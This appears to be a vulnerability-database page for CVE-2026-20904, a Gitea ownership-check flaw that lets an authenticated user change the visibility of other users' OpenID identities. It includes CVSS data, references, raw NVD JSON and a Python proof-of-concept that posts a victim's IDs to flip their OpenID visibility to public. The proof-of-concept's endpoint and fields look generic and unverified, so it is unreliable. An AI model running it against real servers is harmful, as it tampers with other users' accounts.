Security Vulnerability Report
CVE-2026-20904 CVSS 6.5 MEDIUM

CVE-2026-20904

Published: 2026-01-22 22:16:19
Last Modified: 2026-01-29 22:03:09
Source: 88ee5874-cf24-4952-aea0-31affedb7ff2

Description

Gitea does not properly validate ownership when toggling OpenID URI visibility. An authenticated user may be able to change the visibility settings of other users' OpenID identities.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:gitea:gitea:*:*:*:*:*:-:*:* - VULNERABLE
Gitea < 1.25.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import json

# CVE-2026-20904 PoC - Gitea OpenID URI Visibility Manipulation
# Target: Gitea < 1.25.4

TARGET_URL = "http://target-gitea.com"
ATTACKER_TOKEN = "your_attacker_token_here"
TARGET_USER_ID = 123  # Victim user ID
TARGET_OPENID_ID = 456  # Victim's OpenID identity ID


def exploit_visibility_toggle():
    """
    Exploit for CVE-2026-20904: Gitea OpenID URI visibility bypass
    Allows authenticated user to change visibility of other users' OpenID identities
    """
    endpoint = f"{TARGET_URL}/api/v1/user/settings/openid"
    headers = {
        "Authorization": f"token {ATTACKER_TOKEN}",
        "Content-Type": "application/json"
    }

    # Malicious payload - changing visibility of victim's OpenID URI
    payload = {
        "user_id": TARGET_USER_ID,  # Point to victim
        "openid_id": TARGET_OPENID_ID,
        "visibility": "public"  # Change to public (was private)
    }

    try:
        response = requests.post(endpoint, headers=headers, json=payload, timeout=10)
        if response.status_code == 200:
            print("[+] SUCCESS: OpenID visibility changed to public")
            print(f"[+] Target OpenID ID: {TARGET_OPENID_ID} is now visible")
            return True
        else:
            print(f"[-] FAILED: Status code {response.status_code}")
            print(f"[-] Response: {response.text}")
            return False
    except requests.exceptions.RequestException as e:
        print(f"[-] ERROR: {e}")
        return False


if __name__ == "__main__":
    exploit_visibility_toggle()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-20904", "sourceIdentifier": "88ee5874-cf24-4952-aea0-31affedb7ff2", "published": "2026-01-22T22:16:19.130", "lastModified": "2026-01-29T22:03:08.750", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Gitea does not properly validate ownership when toggling OpenID URI visibility. An authenticated user may be able to change the visibility settings of other users' OpenID identities."}, {"lang": "es", "value": "Gitea no valida correctamente la titularidad al alternar la visibilidad de la URI de OpenID. Un usuario autenticado podría cambiar la configuración de visibilidad de las identidades OpenID de otros usuarios."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "88ee5874-cf24-4952-aea0-31affedb7ff2", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitea:gitea:*:*:*:*:*:-:*:*", "versionEndExcluding": "1.25.4", "matchCriteriaId": "DFCB7D74-331D-4582-AB41-113A25BE8FAA"}]}]}], "references": [{"url": "https://blog.gitea.com/release-of-1.25.4/", "source": "88ee5874-cf24-4952-aea0-31affedb7ff2", "tags": ["Release Notes"]}, {"url": "https://github.com/go-gitea/gitea/pull/36346", "source": "88ee5874-cf24-4952-aea0-31affedb7ff2", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/go-gitea/gitea/pull/36361", "source": 
"88ee5874-cf24-4952-aea0-31affedb7ff2", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/go-gitea/gitea/releases/tag/v1.25.4", "source": "88ee5874-cf24-4952-aea0-31affedb7ff2", "tags": ["Release Notes"]}, {"url": "https://github.com/go-gitea/gitea/security/advisories/GHSA-jrpc-w85r-hgqx", "source": "88ee5874-cf24-4952-aea0-31affedb7ff2", "tags": ["Broken Link"]}]}}